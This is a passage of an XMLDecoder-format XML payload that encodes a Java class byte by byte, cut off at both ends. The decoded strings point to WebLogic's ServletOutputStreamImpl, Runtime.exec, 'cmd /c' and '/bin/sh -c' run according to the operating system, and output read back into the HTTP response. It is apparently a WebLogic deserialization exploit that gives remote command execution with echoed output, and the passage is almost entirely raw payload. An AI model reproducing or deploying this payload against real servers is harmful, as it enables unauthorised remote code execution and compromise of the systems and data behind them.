index="2373"><byte>97</byte></void><void index="2374"><byte>47</byte></void><void index="2375"><byte>108</byte></void><void index="2376"><byte>97</byte></void><void index="2377"><byte>110</byte></void><void index="2378"><byte>103</byte></void><void index="2379"><byte>47</byte></void><void index="2380"><byte>83</byte></void><void index="2381"><byte>116</byte></void><void index="2382"><byte>114</byte></void><void index="2383"><byte>105</byte></void><void index="2384"><byte>110</byte></void><void index="2385"><byte>103</byte></void><void index="2386"><byte>59</byte></void><void index="2387"><byte>12</byte></void><void index="2388"><byte>0</byte></void><void index="2389"><byte>89</byte></void><void index="2390"><byte>0</byte></void><void index="2391"><byte>90</byte></void><void index="2392"><byte>10</byte></void><void index="2393"><byte>0</byte></void><void index="2394"><byte>81</byte></void><void index="2395"><byte>0</byte></void><void index="2396"><byte>91</byte></void><void index="2397"><byte>12</byte></void><void index="2398"><byte>0</byte></void><void index="2399"><byte>10</byte></void><void index="2400"><byte>0</byte></void><void index="2401"><byte>71</byte></void><void index="2402"><byte>10</byte></void><void index="2403"><byte>0</byte></void><void index="2404"><byte>79</byte></void><void index="2405"><byte>0</byte></void><void index="2406"><byte>93</byte></void><void index="2407"><byte>1</byte></void><void index="2408"><byte>0</byte></void><void index="2409"><byte>49</byte></void><void index="2410"><byte>119</byte></void><void index="2411"><byte>101</byte></void><void index="2412"><byte>98</byte></void><void index="2413"><byte>108</byte></void><void index="2414"><byte>111</byte></void><void index="2415"><byte>103</byte></void><void index="2416"><byte>105</byte></void><void index="2417"><byte>99</byte></void><void index="2418"><byte>47</byte></void><void index="2419"><byte>115</byte></void><void index="2420"><byte>101</byte></void><void 
index="2421"><byte>114</byte></void><void index="2422"><byte>118</byte></void><void index="2423"><byte>108</byte></void><void index="2424"><byte>101</byte></void><void index="2425"><byte>116</byte></void><void index="2426"><byte>47</byte></void><void index="2427"><byte>105</byte></void><void index="2428"><byte>110</byte></void><void index="2429"><byte>116</byte></void><void index="2430"><byte>101</byte></void><void index="2431"><byte>114</byte></void><void index="2432"><byte>110</byte></void><void index="2433"><byte>97</byte></void><void index="2434"><byte>108</byte></void><void index="2435"><byte>47</byte></void><void index="2436"><byte>83</byte></void><void index="2437"><byte>101</byte></void><void index="2438"><byte>114</byte></void><void index="2439"><byte>118</byte></void><void index="2440"><byte>108</byte></void><void index="2441"><byte>101</byte></void><void index="2442"><byte>116</byte></void><void index="2443"><byte>79</byte></void><void index="2444"><byte>117</byte></void><void index="2445"><byte>116</byte></void><void index="2446"><byte>112</byte></void><void index="2447"><byte>117</byte></void><void index="2448"><byte>116</byte></void><void index="2449"><byte>83</byte></void><void index="2450"><byte>116</byte></void><void index="2451"><byte>114</byte></void><void index="2452"><byte>101</byte></void><void index="2453"><byte>97</byte></void><void index="2454"><byte>109</byte></void><void index="2455"><byte>73</byte></void><void index="2456"><byte>109</byte></void><void index="2457"><byte>112</byte></void><void index="2458"><byte>108</byte></void><void index="2459"><byte>7</byte></void><void index="2460"><byte>0</byte></void><void index="2461"><byte>95</byte></void><void index="2462"><byte>1</byte></void><void index="2463"><byte>0</byte></void><void index="2464"><byte>11</byte></void><void index="2465"><byte>119</byte></void><void index="2466"><byte>114</byte></void><void index="2467"><byte>105</byte></void><void index="2468"><byte>116</byte></void><void 
index="2469"><byte>101</byte></void><void index="2470"><byte>83</byte></void><void index="2471"><byte>116</byte></void><void index="2472"><byte>114</byte></void><void index="2473"><byte>101</byte></void><void index="2474"><byte>97</byte></void><void index="2475"><byte>109</byte></void><void index="2476"><byte>1</byte></void><void index="2477"><byte>0</byte></void><void index="2478"><byte>24</byte></void><void index="2479"><byte>40</byte></void><void index="2480"><byte>76</byte></void><void index="2481"><byte>106</byte></void><void index="2482"><byte>97</byte></void><void index="2483"><byte>118</byte></void><void index="2484"><byte>97</byte></void><void index="2485"><byte>47</byte></void><void index="2486"><byte>105</byte></void><void index="2487"><byte>111</byte></void><void index="2488"><byte>47</byte></void><void index="2489"><byte>73</byte></void><void index="2490"><byte>110</byte></void><void index="2491"><byte>112</byte></void><void index="2492"><byte>117</byte></void><void index="2493"><byte>116</byte></void><void index="2494"><byte>83</byte></void><void index="2495"><byte>116</byte></void><void index="2496"><byte>114</byte></void><void index="2497"><byte>101</byte></void><void index="2498"><byte>97</byte></void><void index="2499"><byte>109</byte></void><void index="2500"><byte>59</byte></void><void index="2501"><byte>41</byte></void><void index="2502"><byte>86</byte></void><void index="2503"><byte>12</byte></void><void index="2504"><byte>0</byte></void><void index="2505"><byte>97</byte></void><void index="2506"><byte>0</byte></void><void index="2507"><byte>98</byte></void><void index="2508"><byte>10</byte></void><void index="2509"><byte>0</byte></void><void index="2510"><byte>96</byte></void><void index="2511"><byte>0</byte></void><void index="2512"><byte>99</byte></void><void index="2513"><byte>1</byte></void><void index="2514"><byte>0</byte></void><void index="2515"><byte>5</byte></void><void index="2516"><byte>102</byte></void><void 
index="2517"><byte>108</byte></void><void index="2518"><byte>117</byte></void><void index="2519"><byte>115</byte></void><void index="2520"><byte>104</byte></void><void index="2521"><byte>12</byte></void><void index="2522"><byte>0</byte></void><void index="2523"><byte>101</byte></void><void index="2524"><byte>0</byte></void><void index="2525"><byte>11</byte></void><void index="2526"><byte>10</byte></void><void index="2527"><byte>0</byte></void><void index="2528"><byte>96</byte></void><void index="2529"><byte>0</byte></void><void index="2530"><byte>102</byte></void><void index="2531"><byte>1</byte></void><void index="2532"><byte>0</byte></void><void index="2533"><byte>7</byte></void><void index="2534"><byte>111</byte></void><void index="2535"><byte>115</byte></void><void index="2536"><byte>46</byte></void><void index="2537"><byte>110</byte></void><void index="2538"><byte>97</byte></void><void index="2539"><byte>109</byte></void><void index="2540"><byte>101</byte></void><void index="2541"><byte>8</byte></void><void index="2542"><byte>0</byte></void><void index="2543"><byte>104</byte></void><void index="2544"><byte>1</byte></void><void index="2545"><byte>0</byte></void><void index="2546"><byte>16</byte></void><void index="2547"><byte>106</byte></void><void index="2548"><byte>97</byte></void><void index="2549"><byte>118</byte></void><void index="2550"><byte>97</byte></void><void index="2551"><byte>47</byte></void><void index="2552"><byte>108</byte></void><void index="2553"><byte>97</byte></void><void index="2554"><byte>110</byte></void><void index="2555"><byte>103</byte></void><void index="2556"><byte>47</byte></void><void index="2557"><byte>83</byte></void><void index="2558"><byte>121</byte></void><void index="2559"><byte>115</byte></void><void index="2560"><byte>116</byte></void><void index="2561"><byte>101</byte></void><void index="2562"><byte>109</byte></void><void index="2563"><byte>7</byte></void><void index="2564"><byte>0</byte></void><void 
index="2565"><byte>106</byte></void><void index="2566"><byte>1</byte></void><void index="2567"><byte>0</byte></void><void index="2568"><byte>11</byte></void><void index="2569"><byte>103</byte></void><void index="2570"><byte>101</byte></void><void index="2571"><byte>116</byte></void><void index="2572"><byte>80</byte></void><void index="2573"><byte>114</byte></void><void index="2574"><byte>111</byte></void><void index="2575"><byte>112</byte></void><void index="2576"><byte>101</byte></void><void index="2577"><byte>114</byte></void><void index="2578"><byte>116</byte></void><void index="2579"><byte>121</byte></void><void index="2580"><byte>12</byte></void><void index="2581"><byte>0</byte></void><void index="2582"><byte>108</byte></void><void index="2583"><byte>0</byte></void><void index="2584"><byte>59</byte></void><void index="2585"><byte>10</byte></void><void index="2586"><byte>0</byte></void><void index="2587"><byte>107</byte></void><void index="2588"><byte>0</byte></void><void index="2589"><byte>109</byte></void><void index="2590"><byte>1</byte></void><void index="2591"><byte>0</byte></void><void index="2592"><byte>16</byte></void><void index="2593"><byte>106</byte></void><void index="2594"><byte>97</byte></void><void index="2595"><byte>118</byte></void><void index="2596"><byte>97</byte></void><void index="2597"><byte>47</byte></void><void index="2598"><byte>108</byte></void><void index="2599"><byte>97</byte></void><void index="2600"><byte>110</byte></void><void index="2601"><byte>103</byte></void><void index="2602"><byte>47</byte></void><void index="2603"><byte>83</byte></void><void index="2604"><byte>116</byte></void><void index="2605"><byte>114</byte></void><void index="2606"><byte>105</byte></void><void index="2607"><byte>110</byte></void><void index="2608"><byte>103</byte></void><void index="2609"><byte>7</byte></void><void index="2610"><byte>0</byte></void><void index="2611"><byte>111</byte></void><void index="2612"><byte>1</byte></void><void 
index="2613"><byte>0</byte></void><void index="2614"><byte>11</byte></void><void index="2615"><byte>116</byte></void><void index="2616"><byte>111</byte></void><void index="2617"><byte>76</byte></void><void index="2618"><byte>111</byte></void><void index="2619"><byte>119</byte></void><void index="2620"><byte>101</byte></void><void index="2621"><byte>114</byte></void><void index="2622"><byte>67</byte></void><void index="2623"><byte>97</byte></void><void index="2624"><byte>115</byte></void><void index="2625"><byte>101</byte></void><void index="2626"><byte>12</byte></void><void index="2627"><byte>0</byte></void><void index="2628"><byte>113</byte></void><void index="2629"><byte>0</byte></void><void index="2630"><byte>90</byte></void><void index="2631"><byte>10</byte></void><void index="2632"><byte>0</byte></void><void index="2633"><byte>112</byte></void><void index="2634"><byte>0</byte></void><void index="2635"><byte>114</byte></void><void index="2636"><byte>1</byte></void><void index="2637"><byte>0</byte></void><void index="2638"><byte>3</byte></void><void index="2639"><byte>119</byte></void><void index="2640"><byte>105</byte></void><void index="2641"><byte>110</byte></void><void index="2642"><byte>8</byte></void><void index="2643"><byte>0</byte></void><void index="2644"><byte>116</byte></void><void index="2645"><byte>1</byte></void><void index="2646"><byte>0</byte></void><void index="2647"><byte>8</byte></void><void index="2648"><byte>99</byte></void><void index="2649"><byte>111</byte></void><void index="2650"><byte>110</byte></void><void index="2651"><byte>116</byte></void><void index="2652"><byte>97</byte></void><void index="2653"><byte>105</byte></void><void index="2654"><byte>110</byte></void><void index="2655"><byte>115</byte></void><void index="2656"><byte>1</byte></void><void index="2657"><byte>0</byte></void><void index="2658"><byte>27</byte></void><void index="2659"><byte>40</byte></void><void index="2660"><byte>76</byte></void><void 
index="2661"><byte>106</byte></void><void index="2662"><byte>97</byte></void><void index="2663"><byte>118</byte></void><void index="2664"><byte>97</byte></void><void index="2665"><byte>47</byte></void><void index="2666"><byte>108</byte></void><void index="2667"><byte>97</byte></void><void index="2668"><byte>110</byte></void><void index="2669"><byte>103</byte></void><void index="2670"><byte>47</byte></void><void index="2671"><byte>67</byte></void><void index="2672"><byte>104</byte></void><void index="2673"><byte>97</byte></void><void index="2674"><byte>114</byte></void><void index="2675"><byte>83</byte></void><void index="2676"><byte>101</byte></void><void index="2677"><byte>113</byte></void><void index="2678"><byte>117</byte></void><void index="2679"><byte>101</byte></void><void index="2680"><byte>110</byte></void><void index="2681"><byte>99</byte></void><void index="2682"><byte>101</byte></void><void index="2683"><byte>59</byte></void><void index="2684"><byte>41</byte></void><void index="2685"><byte>90</byte></void><void index="2686"><byte>12</byte></void><void index="2687"><byte>0</byte></void><void index="2688"><byte>118</byte></void><void index="2689"><byte>0</byte></void><void index="2690"><byte>119</byte></void><void index="2691"><byte>10</byte></void><void index="2692"><byte>0</byte></void><void index="2693"><byte>112</byte></void><void index="2694"><byte>0</byte></void><void index="2695"><byte>120</byte></void><void index="2696"><byte>1</byte></void><void index="2697"><byte>0</byte></void><void index="2698"><byte>17</byte></void><void index="2699"><byte>106</byte></void><void index="2700"><byte>97</byte></void><void index="2701"><byte>118</byte></void><void index="2702"><byte>97</byte></void><void index="2703"><byte>47</byte></void><void index="2704"><byte>108</byte></void><void index="2705"><byte>97</byte></void><void index="2706"><byte>110</byte></void><void index="2707"><byte>103</byte></void><void index="2708"><byte>47</byte></void><void 
index="2709"><byte>82</byte></void><void index="2710"><byte>117</byte></void><void index="2711"><byte>110</byte></void><void index="2712"><byte>116</byte></void><void index="2713"><byte>105</byte></void><void index="2714"><byte>109</byte></void><void index="2715"><byte>101</byte></void><void index="2716"><byte>7</byte></void><void index="2717"><byte>0</byte></void><void index="2718"><byte>122</byte></void><void index="2719"><byte>1</byte></void><void index="2720"><byte>0</byte></void><void index="2721"><byte>10</byte></void><void index="2722"><byte>103</byte></void><void index="2723"><byte>101</byte></void><void index="2724"><byte>116</byte></void><void index="2725"><byte>82</byte></void><void index="2726"><byte>117</byte></void><void index="2727"><byte>110</byte></void><void index="2728"><byte>116</byte></void><void index="2729"><byte>105</byte></void><void index="2730"><byte>109</byte></void><void index="2731"><byte>101</byte></void><void index="2732"><byte>1</byte></void><void index="2733"><byte>0</byte></void><void index="2734"><byte>21</byte></void><void index="2735"><byte>40</byte></void><void index="2736"><byte>41</byte></void><void index="2737"><byte>76</byte></void><void index="2738"><byte>106</byte></void><void index="2739"><byte>97</byte></void><void index="2740"><byte>118</byte></void><void index="2741"><byte>97</byte></void><void index="2742"><byte>47</byte></void><void index="2743"><byte>108</byte></void><void index="2744"><byte>97</byte></void><void index="2745"><byte>110</byte></void><void index="2746"><byte>103</byte></void><void index="2747"><byte>47</byte></void><void index="2748"><byte>82</byte></void><void index="2749"><byte>117</byte></void><void index="2750"><byte>110</byte></void><void index="2751"><byte>116</byte></void><void index="2752"><byte>105</byte></void><void index="2753"><byte>109</byte></void><void index="2754"><byte>101</byte></void><void index="2755"><byte>59</byte></void><void index="2756"><byte>12</byte></void><void 
index="2757"><byte>0</byte></void><void index="2758"><byte>124</byte></void><void index="2759"><byte>0</byte></void><void index="2760"><byte>125</byte></void><void index="2761"><byte>10</byte></void><void index="2762"><byte>0</byte></void><void index="2763"><byte>123</byte></void><void index="2764"><byte>0</byte></void><void index="2765"><byte>126</byte></void><void index="2766"><byte>1</byte></void><void index="2767"><byte>0</byte></void><void index="2768"><byte>7</byte></void><void index="2769"><byte>99</byte></void><void index="2770"><byte>109</byte></void><void index="2771"><byte>100</byte></void><void index="2772"><byte>32</byte></void><void index="2773"><byte>47</byte></void><void index="2774"><byte>99</byte></void><void index="2775"><byte>32</byte></void><void index="2776"><byte>8</byte></void><void index="2777"><byte>0</byte></void><void index="2778"><byte>-128</byte></void><void index="2779"><byte>1</byte></void><void index="2780"><byte>0</byte></void><void index="2781"><byte>4</byte></void><void index="2782"><byte>101</byte></void><void index="2783"><byte>120</byte></void><void index="2784"><byte>101</byte></void><void index="2785"><byte>99</byte></void><void index="2786"><byte>1</byte></void><void index="2787"><byte>0</byte></void><void index="2788"><byte>39</byte></void><void index="2789"><byte>40</byte></void><void index="2790"><byte>76</byte></void><void index="2791"><byte>106</byte></void><void index="2792"><byte>97</byte></void><void index="2793"><byte>118</byte></void><void index="2794"><byte>97</byte></void><void index="2795"><byte>47</byte></void><void index="2796"><byte>108</byte></void><void index="2797"><byte>97</byte></void><void index="2798"><byte>110</byte></void><void index="2799"><byte>103</byte></void><void index="2800"><byte>47</byte></void><void index="2801"><byte>83</byte></void><void index="2802"><byte>116</byte></void><void index="2803"><byte>114</byte></void><void index="2804"><byte>105</byte></void><void 
index="2805"><byte>110</byte></void><void index="2806"><byte>103</byte></void><void index="2807"><byte>59</byte></void><void index="2808"><byte>41</byte></void><void index="2809"><byte>76</byte></void><void index="2810"><byte>106</byte></void><void index="2811"><byte>97</byte></void><void index="2812"><byte>118</byte></void><void index="2813"><byte>97</byte></void><void index="2814"><byte>47</byte></void><void index="2815"><byte>108</byte></void><void index="2816"><byte>97</byte></void><void index="2817"><byte>110</byte></void><void index="2818"><byte>103</byte></void><void index="2819"><byte>47</byte></void><void index="2820"><byte>80</byte></void><void index="2821"><byte>114</byte></void><void index="2822"><byte>111</byte></void><void index="2823"><byte>99</byte></void><void index="2824"><byte>101</byte></void><void index="2825"><byte>115</byte></void><void index="2826"><byte>115</byte></void><void index="2827"><byte>59</byte></void><void index="2828"><byte>12</byte></void><void index="2829"><byte>0</byte></void><void index="2830"><byte>-126</byte></void><void index="2831"><byte>0</byte></void><void index="2832"><byte>-125</byte></void><void index="2833"><byte>10</byte></void><void index="2834"><byte>0</byte></void><void index="2835"><byte>123</byte></void><void index="2836"><byte>0</byte></void><void index="2837"><byte>-124</byte></void><void index="2838"><byte>1</byte></void><void index="2839"><byte>0</byte></void><void index="2840"><byte>11</byte></void><void index="2841"><byte>47</byte></void><void index="2842"><byte>98</byte></void><void index="2843"><byte>105</byte></void><void index="2844"><byte>110</byte></void><void index="2845"><byte>47</byte></void><void index="2846"><byte>115</byte></void><void index="2847"><byte>104</byte></void><void index="2848"><byte>32</byte></void><void index="2849"><byte>45</byte></void><void index="2850"><byte>99</byte></void><void index="2851"><byte>32</byte></void><void index="2852"><byte>8</byte></void><void 
index="2853"><byte>0</byte></void><void index="2854"><byte>-122</byte></void><void index="2855"><byte>1</byte></void><void index="2856"><byte>0</byte></void><void index="2857"><byte>22</byte></void><void index="2858"><byte>106</byte></void><void index="2859"><byte>97</byte></void><void index="2860"><byte>118</byte></void><void index="2861"><byte>97</byte></void><void index="2862"><byte>47</byte></void><void index="2863"><byte>105</byte></void><void index="2864"><byte>111</byte></void><void index="2865"><byte>47</byte></void><void index="2866"><byte>66</byte></void><void index="2867"><byte>117</byte></void><void index="2868"><byte>102</byte></void><void index="2869"><byte>102</byte></void><void index="2870"><byte>101</byte></void><void index="2871"><byte>114</byte></void><void index="2872"><byte>101</byte></void><void index="2873"><byte>100</byte></void><void index="2874"><byte>82</byte></void><void index="2875"><byte>101</byte></void><void index="2876"><byte>97</byte></void><void index="2877"><byte>100</byte></void><void index="2878"><byte>101</byte></void><void index="2879"><byte>114</byte></void><void index="2880"><byte>7</byte></void><void index="2881"><byte>0</byte></void><void index="2882"><byte>-120</byte></void><void index="2883"><byte>1</byte></void><void index="2884"><byte>0</byte></void><void index="2885"><byte>25</byte></void><void index="2886"><byte>106</byte></void><void index="2887"><byte>97</byte></void><void index="2888"><byte>118</byte></void><void index="2889"><byte>97</byte></void><void index="2890"><byte>47</byte></void><void index="2891"><byte>105</byte></void><void index="2892"><byte>111</byte></void><void index="2893"><byte>47</byte></void><void index="2894"><byte>73</byte></void><void index="2895"><byte>110</byte></void><void index="2896"><byte>112</byte></void><void index="2897"><byte>117</byte></void><void index="2898"><byte>116</byte></void><void index="2899"><byte>83</byte></void><void index="2900"><byte>116</byte></void><void 
index="2901"><byte>114</byte></void><void index="2902"><byte>101</byte></void><void index="2903"><byte>97</byte></void><void index="2904"><byte>109</byte></void><void index="2905"><byte>82</byte></void><void index="2906"><byte>101</byte></void><void index="2907"><byte>97</byte></void><void index="2908"><byte>100</byte></void><void index="2909"><byte>101</byte></void><void index="2910"><byte>114</byte></void><void index="2911"><byte>7</byte></void><void index="2912"><byte>0</byte></void><void index="2913"><byte>-118</byte></void><void index="2914"><byte>1</byte></void><void index="2915"><byte>0</byte></void><void index="2916"><byte>17</byte></void><void index="2917"><byte>106</byte></void><void index="2918"><byte>97</byte></void><void index="2919"><byte>118</byte></void><void index="2920"><byte>97</byte></void><void index="2921"><byte>47</byte></void><void index="2922"><byte>108</byte></void><void index="2923"><byte>97</byte></void><void index="2924"><byte>110</byte></void><void index="2925"><byte>103</byte></void><void index="2926"><byte>47</byte></void><void index="2927"><byte>80</byte></void><void index="2928"><byte>114</byte></void><void index="2929"><byte>111</byte></void><void index="2930"><byte>99</byte></void><void index="2931"><byte>101</byte></void><void index="2932"><byte>115</byte></void><void index="2933"><byte>115</byte></void><void index="2934"><byte>7</byte></void><void index="2935"><byte>0</byte></void><void index="2936"><byte>-116</byte></void><void index="2937"><byte>1</byte></void><void index="2938"><byte>0</byte></void><void index="2939"><byte>14</byte></void><void index="2940"><byte>103</byte></void><void index="2941"><byte>101</byte></void><void index="2942"><byte>116</byte></void><void index="2943"><byte>73</byte></void><void index="2944"><byte>110</byte></void><void index="2945"><byte>112</byte></void><void index="2946"><byte>117</byte></void><void index="2947"><byte>116</byte></void><void index="2948"><byte>83</byte></void><void 
index="2949"><byte>116</byte></void><void index="2950"><byte>114</byte></void><void index="2951"><byte>101</byte></void><void index="2952"><byte>97</byte></void><void index="2953"><byte>109</byte></void><void index="2954"><byte>1</byte></void><void index="2955"><byte>0</byte></void><void index="2956"><byte>23</byte></void><void index="2957"><byte>40</byte></void><void index="2958"><byte>41</byte></void><void index="2959"><byte>76</byte></void><void index="2960"><byte>106</byte></void><void index="2961"><byte>97</byte></void><void index="2962"><byte>118</byte></void><void index="2963"><byte>97</byte></void><void index="2964"><byte>47</byte></void><void index="2965"><byte>105</byte></void><void index="2966"><byte>111</byte></void><void index="2967"><byte>47</byte></void><void index="2968"><byte>73</byte></void><void index="2969"><byte>110</byte></void><void index="2970"><byte>112</byte></void><void index="2971"><byte>117</byte></void><void index="2972"><byte>116</byte></void><void index="2973"><byte>83</byte></void><void index="2974"><byte>116</byte></void><void index="2975"><byte>114</byte></void><void index="2976"><byte>101</byte></void><void index="2977"><byte>97</byte></void><void index="2978"><byte>109</byte></void><void index="2979"><byte>59</byte></void><void index="2980"><byte>12</byte></void><void index="2981"><byte>0</byte></void><void index="2982"><byte>-114</byte></void><void index="2983"><byte>0</byte></void><void index="2984"><byte>-113</byte></void><void index="2985"><byte>10</byte></void><void index="2986"><byte>0</byte></void><void index="2987"><byte>-115</byte></void><void index="2988"><byte>0</byte></void><void index="2989"><byte>-112</byte></void><void index="2990"><byte>1</byte></void><void index="2991"><byte>0</byte></void><void index="2992"><byte>42</byte></void><void index="2993"><byte>40</byte></void><void index="2994"><byte>76</byte></void><void index="2995"><byte>106</byte></void><void index="2996"><byte>97</byte></void><void 
index="2997"><byte>118</byte></void><void index="2998"><byte>97</byte></void><void index="2999"><byte>47</byte></void><void index="3000"><byte>105</byte></void><void index="3001"><byte>111</byte></void><void index="3002"><byte>47</byte></void><void index="3003"><byte>73</byte></void><void index="3004"><byte>110</byte></void><void index="3005"><byte>112</byte></void><void index="3006"><byte>117</byte></void><void index="3007"><byte>116</byte></void><void index="3008"><byte>83</byte></void><void index="3009"><byte>116</byte></void><void index="3010"><byte>114</byte></void><void index="3011"><byte>101</byte></void><void index="3012"><byte>97</byte></void><void index="3013"><byte>109</byte></void><void index="3014"><byte>59</byte></void><void index="3015"><byte>76</byte></void><void index="3016"><byte>106</byte></void><void index="3017"><byte>97</byte></void><void index="3018"><byte>118</byte></void><void index="3019"><byte>97</byte></void><void index="3020"><byte>47</byte></void><void index="3021"><byte>108</byte></void><void index="3022"><byte>97</byte></void><void index="3023"><byte>110</byte></void><void index="3024"><byte>103</byte></void><void index="3025"><byte>47</byte></void><void index="3026"><byte>83</byte></void><void index="3027"><byte>116</byte></void><void index="3028"><byte>114</byte></void><void index="3029"><byte>105</byte></void><void index="3030"><byte>110</byte></void><void index="3031"><byte>103</byte></void><void index="3032"><byte>59</byte></void><void index="3033"><byte>41</byte></void><void index="3034"><byte>86</byte></void><void index="3035"><byte>12</byte></void><void index="3036"><byte>0</byte></void><void index="3037"><byte>10</byte></void><void index="3038"><byte>0</byte></void><void index="3039"><byte>-110</byte></void><void index="3040"><byte>10</byte></void><void index="3041"><byte>0</byte></void><void index="3042"><byte>-117</byte></void><void index="3043"><byte>0</byte></void><void index="3044"><byte>-109</byte></void><void 
index="3045"><byte>1</byte></void><void index="3046"><byte>0</byte></void><void index="3047"><byte>19</byte></void><void index="3048"><byte>40</byte></void><void index="3049"><byte>76</byte></void><void index="3050"><byte>106</byte></void><void index="3051"><byte>97</byte></void><void index="3052"><byte>118</byte></void><void index="3053"><byte>97</byte></void><void index="3054"><byte>47</byte></void><void index="3055"><byte>105</byte></void><void index="3056"><byte>111</byte></void><void index="3057"><byte>47</byte></void><void index="3058"><byte>82</byte></void><void index="3059"><byte>101</byte></void><void index="3060"><byte>97</byte></void><void index="3061"><byte>100</byte></void><void index="3062"><byte>101</byte></void><void index="3063"><byte>114</byte></void><void index="3064"><byte>59</byte></void><void index="3065"><byte>41</byte></void><void index="3066"><byte>86</byte></void><void index="3067"><byte>12</byte></void><void index="3068"><byte>0</byte></void><void index="3069"><byte>10</byte></void><void index="3070"><byte>0</byte></void><void index="3071"><byte>-107</byte></void><void index="3072"><byte>10</byte></void><void index="3073"><byte>0</byte></void><void index="3074"><byte>-119</byte></void><void index="3075"><byte>0</byte></void><void index="3076"><byte>-106</byte></void><void index="3077"><byte>1</byte></void><void index="3078"><byte>0</byte></void><void index="3079"><byte>0</byte></void><void index="3080"><byte>8</byte></void><void index="3081"><byte>0</byte></void><void index="3082"><byte>-104</byte></void><void index="3083"><byte>1</byte></void><void index="3084"><byte>0</byte></void><void index="3085"><byte>8</byte></void><void index="3086"><byte>114</byte></void><void index="3087"><byte>101</byte></void><void index="3088"><byte>97</byte></void><void index="3089"><byte>100</byte></void><void index="3090"><byte>76</byte></void><void index="3091"><byte>105</byte></void><void index="3092"><byte>110</byte></void><void 
index="3093"><byte>101</byte></void><void index="3094"><byte>12</byte></void><void index="3095"><byte>0</byte></void><void index="3096"><byte>-102</byte></void><void index="3097"><byte>0</byte></void><void index="3098"><byte>90</byte></void><void index="3099"><byte>10</byte></void><void index="3100"><byte>0</byte></void><void index="3101"><byte>-119</byte></void><void index="3102"><byte>0</byte></void><void index="3103"><byte>-101</byte></void><void index="3104"><byte>1</byte></void><void index="3105"><byte>0</byte></void><void index="3106"><byte>9</byte></void><void index="3107"><byte>103</byte></void><void index="3108"><byte>101</byte></void><void index="3109"><byte>116</byte></void><void index="3110"><byte>87</byte></void><void index="3111"><byte>114</byte></void><void index="3112"><byte>105</byte></void><void index="3113"><byte>116</byte></void><void index="3114"><byte>101</byte></void><void index="3115"><byte>114</byte></void><void index="3116"><byte>1</byte></void><void index="3117"><byte>0</byte></void><void index="3118"><byte>23</byte></void><void index="3119"><byte>40</byte></void><void index="3120"><byte>41</byte></void><void index="3121"><byte>76</byte></void><void index="3122"><byte>106</byte></void><void index="3123"><byte>97</byte></void><void index="3124"><byte>118</byte></void><void index="3125"><byte>97</byte></void><void index="3126"><byte>47</byte></void><void index="3127"><byte>105</byte></void><void index="3128"><byte>111</byte></void><void index="3129"><byte>47</byte></void><void index="3130"><byte>80</byte></void><void index="3131"><byte>114</byte></void><void index="3132"><byte>105</byte></void><void index="3133"><byte>110</byte></void><void index="3134"><byte>116</byte></void><void index="3135"><byte>87</byte></void><void index="3136"><byte>114</byte></void><void index="3137"><byte>105</byte></void><void index="3138"><byte>116</byte></void><void index="3139"><byte>101</byte></void><void index="3140"><byte>114</byte></void><void 
index="3141"><byte>59</byte></void><void index="3142"><byte>12</byte></void><void index="3143"><byte>0</byte></void><void index="3144"><byte>-99</byte></void><void index="3145"><byte>0</byte></void><void index="3146"><byte>-98</byte></void><void index="3147"><byte>10</byte></void><void index="3148"><byte>0</byte></void><void index="3149"><byte>69</byte></void><void index="3150"><byte>0</byte></void><void index="3151"><byte>-97</byte></void><void index="3152"><byte>1</byte></void><void index="3153"><byte>0</byte></void><void index="3154"><byte>19</byte></void><void index="3155"><byte>106</byte></void><void index="3156"><byte>97</byte></void><void index="3157"><byte>118</byte></void><void index="3158"><byte>97</byte></void><void index="3159"><byte>47</byte></void><void index="3160"><byte>105</byte></void><void index="3161"><byte>111</byte></void><void index="3162"><byte>47</byte></void><void index="3163"><byte>80</byte></void><void index="3164"><byte>114</byte></void><void index="3165"><byte>105</byte></void><void index="3166"><byte>110</byte></void><void index="3167"><byte>116</byte></void><void index="3168"><byte>87</byte></void><void index="3169"><byte>114</byte></void><void index="3170"><byte>105</byte></void><void index="3171"><byte>116</byte></void><void index="3172"><byte>101</byte></void><void index="3173"><byte>114</byte></void><void index="3174"><byte>7</byte></void><void index="3175"><byte>0</byte></void><void index="3176"><byte>-95</byte></void><void index="3177"><byte>1</byte></void><void index="3178"><byte>0</byte></void><void index="3179"><byte>5</byte></void><void index="3180"><byte>119</byte></void><void index="3181"><byte>114</byte></void><void index="3182"><byte>105</byte></void><void index="3183"><byte>116</byte></void><void index="3184"><byte>101</byte></void><void index="3185"><byte>12</byte></void><void index="3186"><byte>0</byte></void><void index="3187"><byte>-93</byte></void><void index="3188"><byte>0</byte></void><void 
index="3189"><byte>71</byte></void><void index="3190"><byte>10</byte></void><void index="3191"><byte>0</byte></void><void index="3192"><byte>-94</byte></void><void index="3193"><byte>0</byte></void><void index="3194"><byte>-92</byte></void><void index="3195"><byte>1</byte></void><void index="3196"><byte>0</byte></void><void index="3197"><byte>19</byte></void><void index="3198"><byte>106</byte></void><void index="3199"><byte>97</byte></void><void index="3200"><byte>118</byte></void><void index="3201"><byte>97</byte></void><void index="3202"><byte>47</byte></void><void index="3203"><byte>108</byte></void><void index="3204"><byte>97</byte></void><void index="3205"><byte>110</byte></void><void index="3206"><byte>103</byte></void><void index="3207"><byte>47</byte></void><void index="3208"><byte>69</byte></void><void index="3209"><byte>120</byte></void><void index="3210"><byte>99</byte></void><void index="3211"><byte>101</byte></void><void index="3212"><byte>112</byte></void><void index="3213"><byte>116</byte></void><void index="3214"><byte>105</byte></void><void index="3215"><byte>111</byte></void><void index="3216"><byte>110</byte></void><void index="3217"><byte>7</byte></void><void index="3218"><byte>0</byte></void><void index="3219"><byte>-90</byte></void><void index="3220"><byte>1</byte></void><void index="3221"><byte>0</byte></void><void index="3222"><byte>3</byte></void><void index="3223"><byte>111</byte></void><void index="3224"><byte>117</byte></void><void index="3225"><byte>116</byte></void><void index="3226"><byte>1</byte></void><void index="3227"><byte>0</byte></void><void index="3228"><byte>21</byte></void><void index="3229"><byte>76</byte></void><void index="3230"><byte>106</byte></void><void index="3231"><byte>97</byte></void><void index="3232"><byte>118</byte></void><void index="3233"><byte>97</byte></void><void index="3234"><byte>47</byte></void><void index="3235"><byte>105</byte></void><void index="3236"><byte>111</byte></void><void 
